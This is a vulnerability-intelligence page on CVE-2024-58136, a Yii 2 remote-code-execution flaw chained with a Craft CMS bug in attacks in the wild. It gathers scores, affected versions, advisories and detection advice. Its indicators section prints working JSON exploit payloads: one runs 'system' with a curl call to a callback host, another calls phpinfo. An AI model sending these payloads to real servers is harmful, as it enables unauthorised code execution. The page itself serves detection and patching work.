CVE-2024-58136
published 2025-04-10CVE-2024-58136: Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in…
PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-05-23
Exploited in the wild
EPSS
87.71%
99.7th percentile
Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| craftcms | cms | >= 4.0.0-RC1 < 4.16.17 | 4.16.17 |
| craftcms | cms | >= 5.0.0-RC1 < 5.8.21 | 5.8.21 |
| yiiframework | yii | < 2.0.52 | 2.0.52 |
| yiisoft | yii2 | >= 0 < 2.0.52 | 2.0.52 |
Detection & IOCsextracted from sources · hover to see the quote
command{"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream":"curl {{interactsh-url}}"}}
command{"as hack": {"__class": "GuzzleHttp\\Psr7\\FnStream", "class": "yii\\behaviors\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}
urlPOST /index.php HTTP/1.1 (with Content-Type: application/json and malicious __class JSON payload)
- →Detect HTTP POST requests to /index.php with Content-Type: application/json containing the '__class' key in the JSON body, specifically referencing 'GuzzleHttp\Psr7\FnStream' and Yii behavior classes — this is the exploit payload pattern for CVE-2024-58136. ↗
- →Flag JSON bodies containing the key '__class' with value 'GuzzleHttp\Psr7\FnStream' combined with '_fn_close' set to 'system' or 'phpinfo' — these are the known exploit gadget chains.
- →The exploit chain requires CVE-2025-32432 to first write PHP code into a session file; then CVE-2024-58136 is triggered via a malicious JSON payload to execute that session file. Detect the combination of unusual session file creation followed by a JSON POST with '__class' key. ↗
- →Post-exploitation indicator: look for newly uploaded PHP file manager files on the server following successful exploitation of this chain. ↗
- →Use the Nuclei template flow: first confirm 'Yii' in the HTTP response body (GET /), then send the malicious JSON POST to /index.php. An HTTP callback to an interactsh URL or 'PHP Version'/'PHP Extension' in the response body confirms exploitation.
- →FOFA/Shodan exposure query: search for title='Yii' to identify potentially vulnerable internet-facing Yii2 instances for proactive patching or monitoring.
- ·Craft CMS ships with Yii 2.0.51 (vulnerable) by default even after the CVE-2025-32432 patch; however, the full exploit chain is broken by the Craft CMS fix alone — the Yii vulnerability is not independently triggerable in patched Craft CMS deployments. ↗
- ·CVE-2024-58136 is a regression of CVE-2024-4990; environments that previously patched CVE-2024-4990 but have not upgraded to Yii 2.0.52 remain vulnerable. ↗
- ·This vulnerability affects any product implementing the Yii framework, not just Craft CMS — detection and patching scope should extend to all Yii-based applications. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa9.1CRITICAL
osv9.1CRITICAL
vulncheck9.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
osv·2026-01-05·CVSS 9.1
CVE-2025-68455 [CRITICAL] Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
Note that attackers must have administrator access to the Craft Control Panel for this to work.
Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
Resources:
https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef
https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7
https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593
https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04
### Summary
This was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team deni
GHSA
Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
ghsa·2026-01-05·CVSS 9.1
CVE-2025-68455 [CRITICAL] CWE-470 Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
Note that attackers must have administrator access to the Craft Control Panel for this to work.
Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
Resources:
https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef
https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7
https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593
https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04
### Summary
This was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team deni
OSV
yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key
osv·2025-04-10·CVSS 9.1
CVE-2024-58136 [CRITICAL] yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key
yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key
Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025.
GHSA
yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key
ghsa·2025-04-10·CVSS 9.1
CVE-2024-58136 [CRITICAL] CWE-424 yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key
yiisoft/yii2 Mishandles the Attaching of Behavior Defined by a `__class` Array Key
Yii 2 before 2.0.52 mishandles the attaching of behavior that is defined by an __class array key, a CVE-2024-4990 regression, as exploited in the wild in February through April 2025.
VulnCheck
Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability
vulncheck·2025·CVSS 9.0
CVE-2025-35939 [CRITICAL] CWE-472 Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability
Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability
Craft CMS contains an external control of assumed-immutable web parameter vulnerability. This vulnerability could allow an unauthenticated client to introduce arbitrary values, such as PHP code, to a known local file location on the server. This vulnerability could be chained with CVE-2024-58136 as represented by CVE-2025-32432.
Affected: Craft CMS Craft CMS
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.loginsoft.com/reports/annually/vulnerability-intellige
VulnCheck
Yiiframework Yii Improper Protection of Alternate Path Vulnerability
vulncheck·2024·CVSS 9.0
CVE-2024-58136 [CRITICAL] CWE-424 Yiiframework Yii Improper Protection of Alternate Path Vulnerability
Yiiframework Yii Improper Protection of Alternate Path Vulnerability
Yii Framework contains an improper protection of alternate path vulnerability that may allow a remote attacker to execute arbitrary code. This vulnerability could affect other products that implement Yii, including—but not limited to—Craft CMS, as represented by CVE-2025-32432.
Affected: Yiiframework Yii
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://nvd.nist.gov/vuln/detail/CVE-2024-58136; https://cyberalerts.io/vulnerability/CVE-2024-58136; https://www.cve.org/CVERecord?id=CVE-2024-58136; https://sensepost.com/blog/2025/investigating-an-in-the-wild-c
CISA
Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability
cisa·2025-06-02·CVSS 9.8
CVE-2025-35939 [CRITICAL] CWE-472 Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability
Vulnerability: Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability
Affected: Craft CMS Craft CMS
Craft CMS contains an external control of assumed-immutable web parameter vulnerability. This vulnerability could allow an unauthenticated client to introduce arbitrary values, such as PHP code, to a known local file location on the server. This vulnerability could be chained with CVE-2024-58136 as represented by CVE-2025-32432.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/craftcms/cms/pull/17220 ; https://nvd.nist.gov/vuln/detail/CVE-2025-35939
Remediation Due Date: 2025-06-23
CISA
Yiiframework Yii Improper Protection of Alternate Path Vulnerability
cisa·2025-05-02·CVSS 9.8
CVE-2024-58136 [CRITICAL] CWE-424 Yiiframework Yii Improper Protection of Alternate Path Vulnerability
Vulnerability: Yiiframework Yii Improper Protection of Alternate Path Vulnerability
Affected: Yiiframework Yii
Yii Framework contains an improper protection of alternate path vulnerability that may allow a remote attacker to execute arbitrary code. This vulnerability could affect other products that implement Yii, including—but not limited to—Craft CMS, as represented by CVE-2025-32432.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. For more information, please see: https://www.yiiframework.com/news/709/please-upgrade-to-yii-2
No detection rules found.
Nuclei
Yii2 PHP Framework < 2.0.52 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2024-58136 [CRITICAL] Yii2 PHP Framework < 2.0.52 - Remote Code Execution
Yii2 PHP Framework < 2.0.52 - Remote Code Execution
Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.
Template:
id: CVE-2024-58136
info:
name: Yii2 PHP Framework < 2.0.52 - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
Yii2 PHP Framework before 2.0.52 is vulnerable to remote code execution via improper validation of the __class key in JSON behaviors. An attacker can instantiate arbitrary PHP classes and achieve RCE.
impact: |
Unauthenticated attackers can exploit improper validation of the __class key in JSON behaviors to instantiate arbitrary PHP classes and achieve remote code execution.
remediation: |
Up
Wiz
Crying Out Cloud Newsletter - May 2025 | Wiz
blogs_wiz·2025-05-01·CVSS 10.0
CVE-2025-32433 [CRITICAL] Crying Out Cloud Newsletter - May 2025 | Wiz
Welcome back! This month we’ve seen a lot of action, with both vulnerabilities and security incidents that have left users affected. We bring you the latest cloud security highlights, to help you stay informed and stay secure.
Here are our top picks of cloud security highlights!
Hype or no hype – Critical Vulnerability in Erlang/OTP SSH Implementation
CVE-2025-32433 is a critical vulnerability (CVSS 10.0) in the Erlang/Open Telecom Platform (OTP) SSH implementation that allows unauthenticated remote attackers to execute arbitrary code by exploiting flaws in how the SSH protocol sequence is handled. Specifically, the vulnerability stems from the improper enforcement of message ordering, enabling attackers to send malicious SSH protocol messages before authentication and gain code executi
Checkpoint
28th April – Threat Intelligence Report
blogs_checkpoint·2025-04-28
CVE-2025-31324 28th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 28th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 28th April, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
British retailer Marks & Spencer (M&S) experienced a cyber-attack that caused disruptions to its online order system and in-store contactless payments. The company suspended online orders temporarily, refunded some customers, and reported the incident to the Information Commissioner’s Office (ICO).
Yale New Haven Health (YNH
Bleepingcomputer
Craft CMS RCE exploit chain used in zero-day attacks to steal data
blogs_bleepingcomputer·2025-04-25·CVSS 9.0
[CRITICAL] Craft CMS RCE exploit chain used in zero-day attacks to steal data
## Craft CMS RCE exploit chain used in zero-day attacks to steal data
## Lawrence Abrams
Two vulnerabilities impacting Craft CMS were chained together in zero-day attacks to breach servers and steal data, with exploitation ongoing, according to CERT Orange Cyberdefense.
The vulnerabilities were discovered by Orange Cyberdefense's CSIRT, which was called in to investigate a compromised server.
As part of the investigation, they discovered that two zero-day vulnerabilities impacting Craft CMS were exploited to breach the server:
CVE-2025-32432: A remote code execution (RCE) vulnerability in Craft CMS.
CVE-2024-58136: An input validation flaw in the Yii framework used by Craft CMS.
According to a report by SensePost, the ethical hacking team of Orange Cyberdefense, the threat actors ch
https://github.com/yiisoft/yii2/commit/40fe496eda529fd1d933b56a1022ec32d3cd0b12https://github.com/yiisoft/yii2/compare/2.0.51...2.0.52https://github.com/yiisoft/yii2/pull/20232https://github.com/yiisoft/yii2/pull/20232#issuecomment-2252459709https://www.yiiframework.com/news/709/please-upgrade-to-yii-2-0-52https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-58136
2025-04-10
Published
2025-05-02
Added to CISA KEV
Exploited in the wild